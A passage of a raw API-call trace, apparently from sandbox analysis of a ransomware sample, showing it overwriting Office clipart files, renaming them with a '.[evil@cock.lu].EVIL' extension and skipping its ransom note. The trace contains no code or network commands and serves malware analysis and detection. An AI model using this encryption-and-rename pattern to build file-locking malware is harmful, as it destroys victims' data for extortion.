WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x46a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x46a0, lpOverlapped=0x0) returned 1 [0158.192] CloseHandle (hObject=0x1a8) returned 1 [0158.192] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.192] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.192] __uncaught_exception () returned 0x84b1160800 [0158.192] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.192] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00433_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00433_.wmf.[evil@cock.lu].evil")) returned 1 [0158.193] ??_V@YAXPEAX@Z () returned 0x1 [0158.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF", dwFileAttributes=0x200) returned 0 [0158.197] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.197] wcsstr (_Str="NA00438_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.197] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF") returned 69 [0158.197] wcscmp (_String1="NA00438_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.197] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00438_.WMF") returned 0x0 [0158.197] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF") returned 0x45 [0158.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.199] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2f38, lpOverlapped=0x0) returned 1 [0158.240] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.240] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.240] _errno () returned 0x84b1160840 [0158.240] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.240] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2f40, lpOverlapped=0x0) returned 1 [0158.240] CloseHandle (hObject=0x1a8) returned 1 [0158.240] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.241] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.241] __uncaught_exception () returned 0x84b1160800 [0158.241] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.241] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf.[evil@cock.lu].evil")) returned 1 [0158.242] ??_V@YAXPEAX@Z () returned 0x1 [0158.246] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF", dwFileAttributes=0x200) returned 0 [0158.246] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.246] wcsstr (_Str="NA00452_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.246] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF") returned 69 [0158.246] wcscmp (_String1="NA00452_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.246] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00452_.WMF") returned 0x0 [0158.246] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF") returned 0x45 [0158.246] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.249] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14bc, lpOverlapped=0x0) returned 1 [0158.256] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.256] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.257] _errno () returned 0x84b1160840 [0158.257] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.257] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14c0, lpOverlapped=0x0) returned 1 [0158.257] CloseHandle (hObject=0x1a8) returned 1 [0158.257] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.257] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.257] __uncaught_exception () returned 0x84b1160800 [0158.257] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.258] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf.[evil@cock.lu].evil")) returned 1 [0158.259] ??_V@YAXPEAX@Z () returned 0x1 [0158.262] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF", dwFileAttributes=0x200) returned 0 [0158.262] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.262] wcsstr (_Str="NA00454_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.262] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF") returned 69 [0158.262] wcscmp (_String1="NA00454_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.262] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00454_.WMF") returned 0x0 [0158.262] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF") returned 0x45 [0158.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.265] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1580, lpOverlapped=0x0) returned 1 [0158.272] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.272] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.272] _errno () returned 0x84b1160840 [0158.272] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.272] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x15a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15a0, lpOverlapped=0x0) returned 1 [0158.272] CloseHandle (hObject=0x1a8) returned 1 [0158.272] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.272] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.272] __uncaught_exception () returned 0x84b1160800 [0158.272] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.273] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf.[evil@cock.lu].evil")) returned 1 [0158.274] ??_V@YAXPEAX@Z () returned 0x1 [0158.277] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF", dwFileAttributes=0x200) returned 0 [0158.277] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.277] wcsstr (_Str="NA00458_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.277] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF") returned 69 [0158.277] wcscmp (_String1="NA00458_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.277] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00458_.WMF") returned 0x0 [0158.277] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF") returned 0x45 [0158.277] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.280] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27a4, lpOverlapped=0x0) returned 1 [0158.289] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.289] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.290] _errno () returned 0x84b1160840 [0158.290] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.290] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27c0, lpOverlapped=0x0) returned 1 [0158.290] CloseHandle (hObject=0x1a8) returned 1 [0158.290] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.290] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.290] __uncaught_exception () returned 0x84b1160800 [0158.290] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf.[evil@cock.lu].evil")) returned 1 [0158.292] ??_V@YAXPEAX@Z () returned 0x1 [0158.295] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF", dwFileAttributes=0x200) returned 0 [0158.296] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.296] wcsstr (_Str="NA00462_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.296] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF") returned 69 [0158.296] wcscmp (_String1="NA00462_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.296] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00462_.WMF") returned 0x0 [0158.296] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF") returned 0x45 [0158.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.298] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f6c, lpOverlapped=0x0) returned 1 [0158.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.311] _errno () returned 0x84b1160840 [0158.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4f80, lpOverlapped=0x0) returned 1 [0158.312] CloseHandle (hObject=0x1a8) returned 1 [0158.312] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.312] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.312] __uncaught_exception () returned 0x84b1160800 [0158.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf.[evil@cock.lu].evil")) returned 1 [0158.313] ??_V@YAXPEAX@Z () returned 0x1 [0158.316] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF", dwFileAttributes=0x200) returned 0 [0158.316] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.316] wcsstr (_Str="NA00487_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.316] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF") returned 69 [0158.316] wcscmp (_String1="NA00487_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.316] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00487_.WMF") returned 0x0 [0158.316] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF") returned 0x45 [0158.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.318] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc10, lpOverlapped=0x0) returned 1 [0158.325] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.326] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.326] _errno () returned 0x84b1160840 [0158.326] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.326] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc20, lpOverlapped=0x0) returned 1 [0158.326] CloseHandle (hObject=0x1a8) returned 1 [0158.326] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.326] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.326] __uncaught_exception () returned 0x84b1160800 [0158.326] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.327] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf.[evil@cock.lu].evil")) returned 1 [0158.328] ??_V@YAXPEAX@Z () returned 0x1 [0158.331] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF", dwFileAttributes=0x200) returned 0 [0158.331] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.331] wcsstr (_Str="NA00494_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.331] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF") returned 69 [0158.331] wcscmp (_String1="NA00494_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.331] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00494_.WMF") returned 0x0 [0158.331] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF") returned 0x45 [0158.331] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.333] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x938, lpOverlapped=0x0) returned 1 [0158.341] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.341] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.341] _errno () returned 0x84b1160840 [0158.341] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.341] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x940, lpOverlapped=0x0) returned 1 [0158.341] CloseHandle (hObject=0x1a8) returned 1 [0158.341] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.341] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.341] __uncaught_exception () returned 0x84b1160800 [0158.341] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.342] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf.[evil@cock.lu].evil")) returned 1 [0158.342] ??_V@YAXPEAX@Z () returned 0x1 [0158.345] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF", dwFileAttributes=0x200) returned 0 [0158.345] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.345] wcsstr (_Str="NA00512_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.346] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF") returned 69 [0158.346] wcscmp (_String1="NA00512_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.346] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00512_.WMF") returned 0x0 [0158.346] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF") returned 0x45 [0158.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.348] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb60, lpOverlapped=0x0) returned 1 [0158.355] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.355] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.355] _errno () returned 0x84b1160840 [0158.355] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.355] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb80, lpOverlapped=0x0) returned 1 [0158.356] CloseHandle (hObject=0x1a8) returned 1 [0158.356] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF", _Mode="a", 